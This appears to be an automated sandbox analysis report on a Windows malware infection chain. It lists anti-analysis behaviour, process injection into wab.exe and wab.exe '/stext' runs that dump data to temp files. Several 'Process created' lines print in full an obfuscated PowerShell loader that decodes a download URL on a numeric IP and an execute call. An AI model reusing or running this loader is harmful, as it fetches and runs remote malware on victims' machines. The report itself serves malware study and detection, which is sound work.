                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 5EFE35F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4474Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5437Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7129Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2657Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5183Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4270Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1769Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.5 %
                Source: C:\Windows\System32\wscript.exe TID: 1816Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6444Thread sleep count: 7129 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4708Thread sleep count: 2657 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1784Thread sleep count: 244 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1784Thread sleep time: -122000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920Thread sleep count: 5183 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920Thread sleep time: -15549000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920Thread sleep count: 4270 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920Thread sleep time: -12810000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_240C10F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C6580 FindFirstFileExA,8_2_240C6580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: wscript.exe, 00000000.00000003.1997590256.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002665387.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998011593.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001506645.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000868107.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000627783.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001147023.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXNi
                Source: wscript.exe, 00000000.00000003.2000598221.00000203A2F9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: wscript.exe, 00000000.00000003.1997590256.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002665387.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998011593.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001506645.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000868107.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000627783.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001147023.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2719854612.00000192FC9F0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000002.2002370211.00000203A116B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998069751.00000203A1123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998183309.00000203A114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000490789.00000203A116B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_13-34119
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C8EC8 LdrInitializeThunk,8_2_240C8EC8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_240C60E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C4AB4 mov eax, dword ptr fs:[00000030h]8_2_240C4AB4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C724E GetProcessHeap,8_2_240C724E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_240C60E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_240C2639
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_240C2B1C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_3528.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1084, type: MEMORYSTR
                Maps a DLL or memory area into another process
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3CE0000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A7F808Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sreml
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sreml
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle 